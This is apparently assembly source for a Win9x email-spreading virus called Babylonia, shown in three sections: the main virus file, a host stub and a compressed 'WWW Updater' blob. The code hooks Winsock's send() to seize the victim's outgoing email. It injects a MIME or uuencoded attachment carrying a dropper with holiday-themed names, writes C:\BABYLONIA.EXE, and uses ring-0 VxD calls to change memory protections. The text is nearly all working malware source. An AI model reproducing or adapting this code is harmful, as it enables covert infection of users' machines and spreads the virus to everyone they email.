vxd proc
pop eax
call delta
mov wo [ebp+(ofs @@int-ofs vcode)], 20cdh
sub eax, ebp
add eax, -((ofs @@jmp-ofs vcode)+4)
mov [ebp+(ofs @@jmp-ofs vcode)], eax
pop dwo [ebp+(ofs @@address-ofs vcode)] ;dynamic VxDCall building
mov eax, 12345678h
eax_value equ dwo $-4
@@int:
int 20h
@@address dd 0
db 0e9h
@@jmp dd 0
vxd endp
bound_ db 'OUNDARY="'
bound_sz = $-ofs bound_
db 0
rva2raw proc
push esi
push ecx
push ebx
lea esi, [esp+section+(4*4)] ;first section
movzx ecx, wo [esp+pe_hdr+6+(4*4)]
@@section:
mov ebx, eax
sub ebx, [esi+12]
cmp [esi+8], ebx
jae @@found ;point inside section
sub esi, -40
loop @@section
sub ebx, ebx ;signal error
jmp @@error
@@found:
add ebx, [esi+20] ;convert to raw
@@error:
mov eax, ebx
pop ebx
pop ecx
pop esi
ret
rva2raw endp
check_size proc
test eax, eax
jz @@error
cmp eax, 2*1024*1024
jae @@error ;bigger than 2mb
cmp eax, 8*1024
jbe @@error ;smaller than 4kb
sub edx, edx
push 17
pop ecx ;if((fsize mod 17) = 15)
div ecx ;lexo32 ;-)
sub edx, 15
db 066h, 0b8h ;mov ax, ?
@@error:
sub eax, eax
ret
check_size endp
pstart equ this byte ;wsock32.dll code...
dd 0
db 'C:\_'
driver db 8 dup (0) ;drivername
db '.---', 0
send proc
call init2
mov eax, 12345678h
_send equ dwo $-4
jmp eax ;jmp to hmem send
send endp
init2 proc
cld
pusha
call @@delta
@@delta:
pop ebp
add ebp, -(ofs @@delta-ofs pstart) ;get delta in wsock32.dll
mov ebx, ebp
lea edi, [ebx+(ofs driver-ofs pstart)]
push 8
pop ecx
@@byte:
rol ebx, 4
mov al, bl
and al, 01111b ;convert address to filename
add al, 'A'
stosb
loop @@byte
add ebx, 4
push ebx
db 0b8h
_getfattr dd 0 ;call backdoor
call eax
mov eax, 90909090h
lea edi, [ebp+((ofs send-ofs pstart))]
stosd ;clean calls to install
stosb
mov eax, [ebp] ;get ring0 interface code
test eax, eax
jz @@damaged ;cant get the interface
mov [ebp+(ofs _send-ofs pstart)], eax ;set jmps to my hmem handlers
@@damaged:
popa
ret
init2 endp
pend equ this byte
include unpack.inc
ScanVxd proc
pusha
mov edi, [ebx+0C0000018h] ;Control_Proc_0
@@page:
lea ecx, [edi+4] ;check presence for
test ecx, 00000FFFh
jz @@check ;to each new page encountered
@@mov:
inc edi
cmp [edi], esi ;B8 <esi>
jne @@page
cmp by [edi-1], 0B8h
jne @@page
mov dwo [edi], -1 ;R0_xxx <-- 0xFFFFFFFF
jmp @@page
@@check:
pusha
sub esp, 28
mov esi, esp
push 28
push esi ;esi = MEMORY_BASIC_INFO
push ecx
push 00010134h
call vxd ;VMMcall PageQuery
bt dwo [esi+10h], 3 ;mbi_state & MEM_COMMIT
lea esp, [esp+4*3+28]
popa
jc @@mov ;will not fault?
popa
ret
ScanVxd endp
IF DEBUG EQ TRUE
dropname db 'C:\GOAT.EXE', 0
ELSE
dropname db 'C:\BABYLONIA.EXE', 0
ENDIF
myname dd 0
mem_temp dd 0
mem dd 0
sent dd 0
uudropper dd 0
uusize dd 0
b64dropper dd 0
b64size dd 0
my_send proc
call init
pusha
call delta
mov esi, [esp+(8*4)+(1*4)+4] ;send() buffer
db 0b9h
socket_out dd 0 ;we're monitoring a specific socket?
jecxz @@all
cmp [esp+(8*4)+(1*4)+0], ecx ;if so, then make sure is our
je @@monitor
jmp @@done
@@all:
cmp [esi], 'ATAD' ;email is being send!
jne @@done
mov eax, [esp+(8*4)+(1*4)+0] ;monitor this socket only now
mov [ebp+(ofs socket_out-ofs vcode)], eax
sub eax, eax
mov [ebp+(ofs boundary-ofs vcode)], eax ;init MIME fieldz
mov [ebp+(ofs sent-ofs vcode)], eax
jmp @@done
@@monitor:
mov ecx, [esp+(8*4)+(1*4)+8] ;size
mov edi, esi
mov al, '.' ;search .
push ecx
@@cont_dot:
repne scasb ;not end_of_email yet
jne @@no_dot ;so, check for MIME
cmp dwo [edi-2], 0a0d2e0ah
jne @@cont_dot ;make sure is the end_of_email sign
pop ecx ;ecx=size of buffer
call uu_send
sub eax, eax ;ready to infect next email
mov [ebp+(ofs socket_out-ofs vcode)], eax
jmp @@done ;send the .
@@no_dot:
pop ecx
dec ecx ;monitor MIME emailz
dec ecx
dec ecx ;size-3, since we load DWORDs
test ecx, ecx
js @@done ;buffer smaller than 2, exit!
@@scan:
push ecx
lodsd
dec esi
dec esi
dec esi
push esi
and eax, not 20202020h ;eax=upcase of 1st 4 letterz
db 0bah
boundary dd 0
test edx, edx ;we already found the boundary?
jnz @@boundary_found
sub eax, 'NUOB'
jnz @@bogus ;maybe a boundary?
lea edi, [ebp+(ofs bound_-ofs vcode)]
@@loop_1:
cmp by [edi], ah
je @@done_1
lodsb
cmp al, 'a'
jb @@up
cmp al, 'z' ;check string
ja @@up
and al, not 20h
@@up:
inc edi
not al
cmp by [edi-1], al
je @@loop_1
@@done_1:
jne @@bogus
mov edi, [ebp+(ofs mem-ofs vcode)] ;copy MIME boundary to buffer
mov [ebp+(ofs boundary-ofs vcode)], edi
@@next_b:
lodsb
cmp al, '"'
je @@copied
stosb
jmp @@next_b
@@copied:
sub eax, eax ;now we have all we need for
stosd ;a perfect send :)
jmp @@bogus
@@boundary_found:
push esi
dec esi
dec ecx
sub eax, eax ;search for boundary
@@match:
lodsb
inc edx
cmp by [edx], ah
je @@is_boundary
cmp by [edx], al ;compare stringz
je @@match
@@is_boundary:
xchg edi, esi ;edi=end of boundary+1
pop esi
jne @@bogus ;end reached and all match?
cmp al, '-'
jne @@bogus
scasb ;found last boundary!
jne @@bogus
pop eax ;fix stack
mov [esp], edi
mov wo [edi-2], 0A0Dh ;turn to normal boundary
sub edi, [esp+(8*4)+(1*4)+4+4] ;subtract buffer address
xchg [esp+(8*4)+(1*4)+8+4], edi ;new size
mov [ebp+(ofs eax_value2-ofs vcode)], edi ;save old for return
push dwo [esp+(8*4)+(1*4)+8+4] ;size
push dwo [esp+(8*4)+(1*4)+8+4] ;buffer
call safesend
pop edi ;interception point
mov wo [edi-2], '--' ;restore user buffer
mov [ebp+(ofs eax_value2-ofs vcode)], eax
jc @@error
call uu_send
mov eax, [ebp+(ofs eax_value2-ofs vcode)] ;how much they want send
mov ebx, [esp+(8*4)+(1*4)+8] ;how much we already send
sub eax, ebx
jz @@gran_finale ;done
mov [esp+(8*4)+(1*4)+8], eax ;send rest
add [esp+(8*4)+(1*4)+4], ebx ;starting from last send byte
push dwo [esp+(8*4)+(1*4)+8] ;size
push dwo [esp+(8*4)+(1*4)+8] ;buffer
call safesend ;send the remainder of user buffer
jc @@error
@@gran_finale:
mov edi, [ebp+(ofs boundary-ofs vcode)]
mov esi, edi
@@next1:
lodsb
test al, al
jnz @@next1 ;search end
xchg edi, esi
dec edi
add al, '-'
stosb ;make last boundary
stosb
sub edi, esi ;calculate the size
push edi ;size
push esi
call safesend ;send last boundary
@@error:
popa
db 0b8h
eax_value2 dd 0 ;return no error
ret 4*4
@@bogus:
pop esi
pop ecx
dec ecx
jnz @@scan ;bahh... to far to a loop
@@done:
popa
mov eax, 12345678h
oldsend equ dwo $-4
jmp eax
my_send endp
script db 'Content-Type: application/octet-stream; name="', 1, '"', 13, 10
db 'Content-Disposition: attachment; filename="', 1, '"', 13, 10
db 'Content-Transfer-Encoding: base64', 13, 10, 13, 10
db 0
script_sz = $-ofs script
uu_send proc
pusha
sub eax, eax
cmp [ebp+(ofs sent-ofs vcode)], eax
jne @@already
mov edi, [ebp+(ofs boundary-ofs vcode)]
cmp edi, eax
je @@skip_header
add edi, 100h ;work after boundary
push edi
lea esi, [ebp+(ofs script-ofs vcode)]
@@expand:
lodsb
not al
test al, al
jz @@send_header
cmp al, 1
jnz @@name
call ninsert ;insert exe name
db 0b0h
@@name:
stosb
jmp @@expand
@@send_header:
pop esi
sub edi, esi
push edi ;size
push esi ;buffer
call safesend ;send mime header
jc @@fuxkx
mov edi, [ebp+(ofs b64size-ofs vcode)]
mov esi, [ebp+(ofs b64dropper-ofs vcode)]
jmp @@block
@@skip_header:
mov edi, [ebp+(ofs uusize-ofs vcode)]
mov esi, [ebp+(ofs uudropper-ofs vcode)]
@@block:
mov eax, 4*1024 ;block size=4kb
cmp eax, edi
jb @@low
mov eax, edi ;send the remainder
@@low:
push eax ;size
push esi ;buffer
call safesend
jc @@fuxkx
add esi, eax
sub edi, eax
jnz @@block ;blockz left?
@@fuxkx:
mov [ebp+(ofs sent-ofs vcode)], ebp
@@already:
popa
ret
uu_send endp
init proc
pusha
cld
sub eax, eax
call delta
cmp [ebp+(ofs mem-ofs vcode)], eax
jne @@inited ;we already inited our dropper?
mov eax, [ebp+(ofs mem_temp-ofs vcode)]
mov [ebp+(ofs mem-ofs vcode)], eax
test eax, eax
jz @@inited
push eax
call @@over
include dropper.inc
@@over:
call _aP_depack_asm ;unpack dropper data
add esp, -8*2
push esp
db 0b8h
_gsystime dd 0
call eax
mov bl, [esp+(1*2)] ;bh=month
add esp, 8*2
push 6
lea esi, [ebp+(ofs dates-ofs vcode)]
lea ecx, [ebp+(ofs name0-ofs vcode)]
mov [ebp+(ofs myname-ofs vcode)], ecx
pop ecx
@@next_date:
lodsw
cmp ah, bl
je @@is
cmp bl, al
jne @@nope ;this holiday isnt this month
@@is:
pusha
mov edi, [ebp+(ofs mem-ofs vcode)]
add edi, icon ;where icon should go in dropper
mov esi, edi
add esi, (ofs coelho-icon) ;first icon
mov eax, 1152
xchg eax, ecx ;eax=count ecx=size icon
dec eax
lea edx, [ebp+(ofs names-ofs vcode)]
mov edx, [edx+(eax*4)]
add edx, ebp
mov [ebp+(ofs myname-ofs vcode)], edx ;get dropper name
cdq
mul ecx ;count*size+base=new icon
add esi, eax
rep movsb ;install new icon
popa
@@nope:
loop @@next_date ;check next date
push 2
lea esi, [ebp+(ofs dropname-ofs vcode)]
pop ecx
call r3_open
jz @@fux0r
push DROPPER_SIZE
mov esi, [ebp+(ofs mem-ofs vcode)]
pop ecx
call r3_write ;write clean dropper
call r3_close
push 3
lea esi, [ebp+(ofs dropname-ofs vcode)]
pop ecx
call r3_open
jz @@fux0r1
call r3_seof ;get new dropper size
cmp eax, DROPPER_SIZE
je @@fux0r2 ;was infected?
push eax
call r3_ssof
mov edi, [ebp+(ofs mem-ofs vcode)]
mov ecx, [esp]
lea eax, [edi+ecx]
push edi
push eax
call r3_read ;read infected dropper
@@fux0r2:
call r3_close
@@fux0r1:
lea eax, [ebp+(ofs dropname-ofs vcode)]
push eax
db 0b8h
_fdelete dd 0
call eax
pop edi ;edi=uuencode buffer
mov esi, [esp] ;esi=image
mov ecx, [esp+4] ;ecx=size
call uuencode
call delta
mov [ebp+(ofs uudropper-ofs vcode)], edi
mov [ebp+(ofs uusize-ofs vcode)], ecx
pop esi ;esi=image
lea edi, [edi+ecx]
pop eax ;eax=size
call BASE64
mov [ebp+(ofs b64dropper-ofs vcode)], edi
mov [ebp+(ofs b64size-ofs vcode)], ecx
lea eax, [ebp+(ofs wsock-ofs vcode)]
push eax
db 0b8h
_getmhandle dd 0
call eax
mov edi, [ebp+(ofs _getproc-ofs vcode)] ;eax=wsokc32 base
call @@112
db 'WSAGetLastError', 0
@@112:
push eax
call edi
mov [ebp+(ofs _WSAGetLastError-ofs vcode)], eax
jmp @@inited
@@fux0r:
sub eax, eax
mov [ebp+(ofs mem-ofs vcode)], eax
@@inited:
popa
ret
init endp
decript_names proc
pusha
call delta
lea edi, [ebp+(ofs name0-ofs vcode)]
push name_sz
pop ecx
mov esi, edi
@@999:
lodsb
not al ;crypt/decrypt
stosb
loop @@999
popa
ret
decript_names endp
ninsert proc
pusha
call decript_names
mov esi, [ebp+(ofs myname-ofs vcode)]
@@next:
lodsb
stosb
test al, al
jnz @@next
dec edi
mov eax, not 'EXE.'
not eax
stosd
mov [esp], edi
call decript_names
popa
ret
ninsert endp
dates equ this byte
db 06, 07 ; BABILONIA - US FLAG
db 12, 12 ; NAVIDAD - Papai Noel
db 04, 04 ; PASCOA - Ovo
db 01, 01 ; REYES MAGOS - Jesus
db 10, 11 ; HALLOWEN - Abobora
db 03, 03 ; PASCOA2 - Coelho
name0 db 'I-WATCH-U', 0 ;default name
name1 db 'BABILONIA', 0
name2 db 'X-MAS', 0
name3 db 'SURPRISE!', 0
name4 db 'JESUS', 0
name5 db 'BUHH', 0
name6 db 'CHOCOLATE', 0
name_sz = $-ofs name0
names equ this byte
dd (ofs name6-ofs vcode)
dd (ofs name5-ofs vcode)
dd (ofs name4-ofs vcode)
dd (ofs name3-ofs vcode)
dd (ofs name2-ofs vcode)
dd (ofs name1-ofs vcode)
dd 0
r3_open proc
sub eax, eax
push eax
push 22h
push ecx
push eax
push eax
push 0c0000000h
push esi
mov eax, 12345678h
_openfile equ dwo $-4
call eax ;CreateFileA
mov [ebp+(ofs r3handle-ofs vcode)], eax
inc eax
ret
r3_open endp
r3_close proc
push 12345678h
org $-4
r3handle dd 0
mov eax, 12345678h
_closehandle equ dwo $-4
call eax ;CloseHandle
ret
r3_close endp
r3_write proc
push 0
call @@1
dd 0
@@1: push ecx
push esi
push dwo [ebp+(ofs r3handle-ofs vcode)]
mov eax, 12345678h
_writefile equ dwo $-4
call eax ;WriteFile
ret
r3_write endp
r3_read proc
push 0
call @@1
dd 0
@@1: push ecx
push edi
push dwo [ebp+(ofs r3handle-ofs vcode)]
mov eax, 12345678h
_readfile equ dwo $-4
call eax ;WriteFile
ret
r3_read endp
r3_ssof proc
push 0
db 66h,0b8h
r3_seof proc
push 2
push 0
push 0
push dwo [ebp+(ofs r3handle-ofs vcode)]
mov eax, 12345678h
_seekfile equ dwo $-4
call eax
ret
r3_seof endp
r3_ssof endp
;UUENCODE
;ESI=Data to encode
;EDI=Buffer
;ECX=Size of data
uuencode proc
cld
push edi
push esi
push ecx
mov eax, 065620A0Dh
stosw
stosd
mov eax, not ' nig'
not eax
stosd
mov eax, not ' 446'
not eax
stosd
call ninsert ;insert dropper name
mov ax, 0A0Dh
stosw
mov eax, [esp] ;eax=size
cdq
push 45
pop ebx
div ebx ;dl=rest in last line
mov ecx, eax ;ecx=number of lines
pop ebp ;esi=start of data
pop esi
add ebp, esi ;ebp=end of data
@@line:
push ecx
mov al, "M" ;start of line
stosb
push 15
pop ecx ;read 15*3 => write 15*4
@@octet:
call getbyte
shr al, 2
call convert ;1st char
shl al, 4
and al, 00110000b
mov bh, al
call getbyte
shr al, 4
and al, 00001111b
or al, bh
call convert ;2nd char
shl al, 2
and al, 11111100b
mov bh, al
call getbyte
shr al, 6
and al, 00000011b
or al, bh
call convert ;3th char
call convert ;4th char
loop @@octet
mov ax, 0A0Dh
stosw
pop ecx
loop @@line ;do next line
mov eax, edx
test al, al
jz @@end
add al, 20h ;do remainder
stosb
xor eax, eax
mov al, dl
xor edx, edx
xor ecx, ecx
push 3
pop ebx
div ebx
mov ecx, eax
test edx, edx
jz @@no_rest
inc cx ;octets to make
@@no_rest:
push 1 ;is last line
sub edx, edx ;with no rest
jmp @@octet
@@end:
mov eax, 0650A0D60h ;"end"
stosd
mov eax, 00A0D646Eh
stosd
shr eax, 16 ;cr+lf
stosw
pop ecx
sub edi, ecx
xchg edi, ecx
ret
uuencode endp
wsock db 'WSOCK32.DLL', 0
convert proc
and al, 00111111b
jnz @@0
add al, 40h
@@0:
add al, 20h
stosb
mov al, ah
ret
convert endp
getbyte proc
cmp esi, ebp ;end of buffer?
jne @@load
xor al, al
db 0b4h ;skip LODSB
@@load:
lodsb
mov ah, al ;backup
ret
getbyte endp
protect proc
inc ecx
add ecx, 4096 ;tnz again to z0mbie!
shr ecx, 12
test ebx, 4095
jnz @@forget
shr ebx, 12
push 0
push not (00020000h+00040000h) ;not writeable+user
push ecx
push ebx
push 00010133h ;PageModifyPermissions
call vxd
add esp, 4*4
@@forget:
ret
protect endp
safesend proc
pusha
@@retry:
mov eax, [esp+4+(8*4)]
mov ecx, [esp+8+(8*4)]
push 0
push ecx ;size
push eax ;buffer
push dwo [ebp+(ofs socket_out-ofs vcode)]
call [ebp+(ofs oldsend-ofs vcode)]
mov ecx, eax
inc ecx
jnz @@done
db 0b8h
_WSAGetLastError dd 0
call eax
sub eax, 10035 ;EWOULDBLOCK?
jz @@retry
stc ;error
db 0b1h
@@done:
clc
mov [esp+(7*4)], eax
popa
ret 2*4
safesend endp
;esi=input
;edi=output
;eax=size
BASE64 proc
cld
push edi
push 3
call @@trans
trans_table = $
db 'A','B','C','D','E','F','G','H','I','J'
db 'K','L','M','N','O','P','Q','R','S','T'
db 'U','V','W','X','Y','Z','a','b','c','d'
db 'e','f','g','h','i','j','k','l','m','n'
db 'o','p','q','r','s','t','u','v','w','x'
db 'y','z','0','1','2','3','4','5','6','7'
db '8','9','+','/'
chars dd ? ;contador de caracteres
@@trans:
pop ebx
push (ofs chars-ofs trans_table)
pop ecx
@@1:
not by [ebx+ecx-1] ;crazy, isnt? ;)
loop @@1 ;now, imagine what i can do if i wasnt stoned all time
pop ecx
cdq
mov dwo [ebx+ecx+((ofs chars-ofs trans_table)-3)], edx ;tricky ;)
div ecx
mov ecx, eax
push edx
@@loop:
lodsd
dec esi ;edx=original
mov edx, eax ;edx=work copy
call Temp
call CODE64Block3
call CODE64Block4
loop @@loop
pop ecx ;get rest
jecxz @@done
lodsd
dec ecx
jz @@rest1
movzx edx, ax ;use only 2 bytes
call Temp
call CODE64Block3
jmp @@end
@@rest1:
movzx edx, al ;use 1 byte only
call Temp
inc ecx
inc ecx
@@end:
mov al, '='
rep stosb
@@done:
mov eax, 0A0D0A0Dh
stosd
push (ofs chars-ofs trans_table)
pop ecx
@@2:
not by [ebx+ecx-1]
loop @@2
pop ecx
sub edi, ecx ;edi=buffer
xchg ecx, edi ;ecx=size
ret
BASE64 endp
Temp proc
call CODE64Block1 ;little optimizing routine
call CODE64Block2
ret
Temp endp
CODE64Block1:
mov eax, edx
shr eax, 02h
process3:
jmp process
CODE64Block2:
mov eax, edx
shl al, 04h
shr ah, 04h
process2:
or al, ah ;chained jmps
jmp process3 ;another "why make it easy?" (c) Vecna ;)
CODE64Block3:
mov eax, edx
shr eax, 08h
shl al, 02h
shr ah, 06h
jmp process2
CODE64Block4:
mov eax,edx
shr eax,10h
process:
and al,00111111b
xlatb
stosb
mov eax, dwo [ebx+(ofs chars-ofs trans_table)]
inc eax
mov dwo [ebx+(ofs chars-ofs trans_table)], eax
pusha
push 0000004Ch
pop ecx
cdq
div ecx
test edx, edx
popa
jnz @@noline
mov ax, 0A0Dh
stosw
@@noline:
ret
align 4
vend equ this byte
db 'EOV', 0
_VIRUS ends
end main
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[BABYLON.ASM]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[HOST.INC]ÄÄÄ
_TEXT segment dword use32 public 'CODE'
main proc
call init001
push 0
push ofs caption
push ofs msg
push 0
temp1 equ $
call virusmain
extrn MessageBoxA:PROC
call MessageBoxA
push 0
extrn ExitProcess:PROC
call ExitProcess
main endp
init001 proc
mov esi, ofs hlp1_s
mov edi, esi
mov ecx, hlp1_sz
@@1:
lodsb
not al
stosb
loop @@1
mov esi, ofs bound_
mov edi, esi
mov ecx, bound_sz
@@2:
lodsb
not al
stosb
loop @@2
mov esi, ofs script
mov edi, esi
mov ecx, script_sz
@@3:
lodsb
not al
stosb
loop @@3
mov esi, ofs name0
mov edi, esi
mov ecx, name_sz
@@4:
lodsb
not al
stosb
loop @@4
mov esi, ofs trans_table
mov edi, esi
mov ecx, (ofs chars-ofs trans_table)
@@5:
lodsb
not al
stosb
loop @@5
ret
init001 endp
_TEXT ends
_DATA segment dword use32 public 'DATA'
IF DEBUG EQ TRUE
caption db 'Vecna virus (DEBUG)', 0
ELSE
caption db 'Vecna virus', 0
ENDIF
msg db 'You just released a Win9x virus!', 0
_DATA ends
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[HOST.INC]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[UPDATER.INC]ÄÄÄ
;Compressed WWW Updater
;(C) Vecna
db 04Dh, 038h, 05Ah, 090h, 038h, 003h, 066h, 002h
db 004h, 009h, 071h, 0FFh, 081h, 0B8h, 0C2h, 091h
db 001h, 040h, 0C2h, 015h, 0C6h, 080h, 009h, 00Eh
db 0B4h, 04Ch, 0CDh, 021h, 015h, 001h, 0EBh, 018h
db 050h, 045h, 008h, 04Ch, 001h, 053h, 003h, 014h
db 0CEh, 0E0h, 003h, 00Fh, 001h, 00Bh, 096h, 013h
db 065h, 008h, 009h, 006h, 032h, 015h, 010h, 09Ch
db 022h, 052h, 040h, 010h, 020h, 002h, 057h, 001h
db 051h, 08Ah, 040h, 018h, 04Eh, 015h, 007h, 0D9h
db 053h, 020h, 04Dh, 008h, 0EEh, 095h, 04Bh, 095h
db 030h, 011h, 0E5h, 06Bh, 001h, 0A0h, 043h, 04Fh
db 044h, 052h, 045h, 08Dh, 0DDh, 02Bh, 0ECh, 095h
db 002h, 024h, 0A5h, 041h, 0B7h, 040h, 044h, 041h
db 054h, 0CAh, 0B9h, 028h, 020h, 04Ch, 024h, 00Ah
db 0A5h, 0F3h, 060h, 0C0h, 02Eh, 069h, 064h, 039h
db 061h, 074h, 053h, 028h, 024h, 030h, 0D1h, 0E5h
db 00Ch, 02Ah, 028h, 052h, 088h, 0A0h, 0FCh, 068h
db 003h, 040h, 080h, 0E8h, 032h, 0A6h, 005h, 00Bh
db 002h, 020h, 02Bh, 0C0h, 050h, 06Ah, 073h, 001h
db 0E8h, 068h, 031h, 080h, 021h, 05Ch, 0E8h, 0EAh
db 043h, 016h, 035h, 07Ah, 095h, 044h, 065h, 080h
db 00Ch, 0FAh, 0FFh, 074h, 059h, 00Ah, 0FEh, 0EAh
db 048h, 009h, 0C7h, 005h, 04Ch, 021h, 0B0h, 021h
db 068h, 05Bh, 060h, 010h, 012h, 064h, 067h, 0FFh
db 036h, 0E1h, 088h, 00Dh, 089h, 026h, 03Ah, 014h
db 025h, 050h, 03Ah, 032h, 03Ah, 06Bh, 08Bh, 0ACh
db 00Bh, 02Eh, 08Fh, 040h, 006h, 058h, 028h, 083h
db 03Dh, 033h, 0C1h, 082h, 018h, 068h, 060h, 0EAh
db 098h, 0A1h, 04Eh, 0B5h, 0EBh, 0C2h, 070h, 06Ah
db 0A4h, 068h, 06Dh, 0FEh, 05Dh, 018h, 0DDh, 02Dh
db 08Fh, 02Bh, 081h, 0ECh, 08Dh, 001h, 077h, 0D9h
db 068h, 0A9h, 00Fh, 01Eh, 091h, 0DAh, 003h, 085h
db 0C0h, 00Fh, 084h, 0B2h, 028h, 0E1h, 005h, 012h
db 006h, 08Bh, 0F8h, 0BEh, 0C8h, 020h, 00Eh, 031h
db 0B9h, 00Eh, 023h, 0F3h, 0A4h, 094h, 073h, 0DCh
db 022h, 0C8h, 090h, 0AAh, 039h, 00Ah, 055h, 050h
db 0E8h, 0C2h, 014h, 064h, 07Ch, 04Ah, 0BEh, 036h
db 08Eh, 0FDh, 0BAh, 04Ch, 0FFh, 002h, 047h, 003h
db 0ACh, 084h, 0C0h, 074h, 06Fh, 038h, 0BDh, 00Ah
db 08Bh, 0F5h, 07Fh, 061h, 055h, 0E8h, 08Ah, 050h
db 02Ch, 074h, 054h, 02Bh, 01Bh, 0EDh, 068h, 07Ch
db 023h, 0AAh, 078h, 08Fh, 016h, 069h, 03Fh, 08Dh
db 087h, 00Ch, 0BFh, 002h, 037h, 025h, 0D9h, 0D4h
db 002h, 002h, 080h, 0E8h, 0E6h, 0A0h, 028h, 075h
db 025h, 06Ah, 00Ch, 034h, 068h, 0C9h, 02Bh, 082h
db 029h, 055h, 0A2h, 008h, 0FFh, 035h, 08Ah, 031h
db 072h, 0A9h, 00Bh, 091h, 0C3h, 018h, 0BAh, 0FEh
db 0DDh, 0EBh, 005h, 0EFh, 0BCh, 00Dh, 094h, 081h
db 0C4h, 096h, 083h, 0C3h, 080h, 03Dh, 049h, 09Ah
db 038h, 014h, 00Fh, 085h, 00Eh, 014h, 0FEh, 005h
db 00Dh, 050h, 0F0h, 090h, 089h, 054h, 0EFh, 0AEh
db 00Dh, 036h, 0E8h, 062h, 06Fh, 056h, 045h, 090h
db 057h, 0BAh, 034h, 0D8h, 042h, 06Ah, 040h, 068h
db 041h, 0CEh, 010h, 0B4h, 0FEh, 0FAh, 08Ch, 022h
db 01Dh, 0C6h, 043h, 0A3h, 05Ch, 0C4h, 0A6h, 0DAh
db 045h, 0B3h, 0A8h, 0E0h, 00Eh, 0D4h, 03Eh, 0A3h
db 08Ch, 011h, 00Bh, 0E8h, 061h, 013h, 07Bh, 00Fh
db 082h, 088h, 088h, 037h, 08Bh, 03Dh, 041h, 003h
db 0F8h, 089h, 0E1h, 054h, 048h, 093h, 036h, 0A9h
db 0C2h, 073h, 0C4h, 060h, 057h, 0AAh, 0F3h, 0B1h
db 02Ch, 0E7h, 080h, 04Dh, 072h, 05Dh, 081h, 039h
db 056h, 04Dh, 098h, 08Dh, 00Ah, 075h, 055h, 083h
db 079h, 096h, 01Eh, 077h, 043h, 00Fh, 0B7h, 041h
db 008h, 0D3h, 0E0h, 0B7h, 0D0h, 0F8h, 007h, 075h
db 043h, 000h, 08Bh, 079h, 014h, 003h, 0F9h, 068h
db 052h, 012h, 091h, 0E2h, 051h, 060h, 015h, 019h
db 0FCh, 0F6h, 068h, 016h, 00Ch, 042h, 06Ch, 026h
db 0D7h, 013h, 0CAh, 0ECh, 049h, 004h, 0F7h, 060h
db 038h, 061h, 028h, 0EBh, 086h, 09Dh, 070h, 0C0h
db 0ACh, 0C1h, 016h, 057h, 0E8h, 063h, 05Dh, 0E9h
db 059h, 08Eh, 00Bh, 0C6h, 04Dh, 0FDh, 020h, 012h
db 060h, 01Ch, 08Bh, 044h, 024h, 07Ah, 03Ah, 04Ch
db 028h, 028h, 0DDh, 032h, 051h, 050h, 098h, 058h
db 023h, 0E8h, 04Ah, 003h, 041h, 08Bh, 0C8h, 041h
db 075h, 00Eh, 0D7h, 0FCh, 015h, 02Dh, 030h, 033h
db 027h, 00Ah, 074h, 0D8h, 0F9h, 051h, 0B1h, 0C9h
db 085h, 056h, 01Ch, 061h, 0C2h, 085h, 028h, 02Eh
db 034h, 021h, 01Ch, 064h, 024h, 03Eh, 02Ah, 06Ah
db 0B2h, 0E8h, 002h, 071h, 0E8h, 092h, 006h, 051h
db 0A3h, 032h, 0CAh, 041h, 040h, 0F9h, 016h, 02Fh
db 0A0h, 09Ch, 0D2h, 0A9h, 024h, 014h, 015h, 0E1h
db 041h, 050h, 08Bh, 0F4h, 0F8h, 010h, 056h, 0A6h
db 052h, 061h, 0E2h, 023h, 083h, 0ECh, 0F0h, 022h
db 089h, 073h, 088h, 08Bh, 07Ch, 028h, 024h, 02Ch
db 0C5h, 042h, 010h, 012h, 080h, 002h, 062h, 0A0h
db 0A9h, 020h, 0B8h, 047h, 045h, 054h, 00Ah, 020h
db 0ABh, 08Bh, 074h, 08Dh, 00Ch, 0E8h, 0AFh, 01Fh
db 0BEh, 048h, 053h, 058h, 088h, 0A5h, 0B7h, 027h
db 01Fh, 028h, 09Ch, 086h, 0B8h, 00Dh, 00Ah, 004h
db 031h, 0ABh, 02Bh, 07Fh, 057h, 0FFh, 08Fh, 028h
db 030h, 0E8h, 0D2h, 041h, 023h, 072h, 071h, 08Bh
db 05Ch, 04Ch, 04Fh, 053h, 098h, 0F6h, 0A0h, 011h
db 060h, 003h, 04Dh, 0D8h, 059h, 030h, 0EDh, 06Dh
db 02Ch, 02Bh, 0DEh, 060h, 089h, 03Ah, 01Ch, 081h
db 03Eh, 048h, 071h, 054h, 03Ah, 050h, 075h, 080h
db 0B9h, 043h, 06Fh, 06Eh, 074h, 087h, 0D9h, 01Fh
db 0ACh, 03Ah, 0C3h, 003h, 017h, 039h, 05Eh, 0FFh
db 0A8h, 012h, 081h, 07Eh, 033h, 003h, 065h, 024h
db 02Dh, 0F3h, 009h, 007h, 012h, 007h, 054h, 079h
db 070h, 0CFh, 067h, 004h, 0E2h, 011h, 0E3h, 021h
db 046h, 094h, 01Ch, 0FCh, 069h, 00Ch, 075h, 0F6h
db 089h, 086h, 018h, 0AEh, 0C3h, 0FFh, 04Ah, 0EDh
db 00Ah, 0F8h, 0EBh, 011h, 013h, 062h, 0FAh, 001h
db 039h, 0F9h, 021h, 016h, 071h, 01Eh, 062h, 00Bh
db 004h, 003h, 0AAh, 0EBh, 0F8h, 0C1h, 099h, 03Eh
db 02Eh, 0E5h, 016h, 084h, 00Ah, 041h, 072h, 00Fh
db 002h, 07Ah, 077h, 00Ah, 001h, 05Ah, 076h, 007h
db 000h, 061h, 073h, 002h, 012h, 0F8h, 0B0h, 0F9h
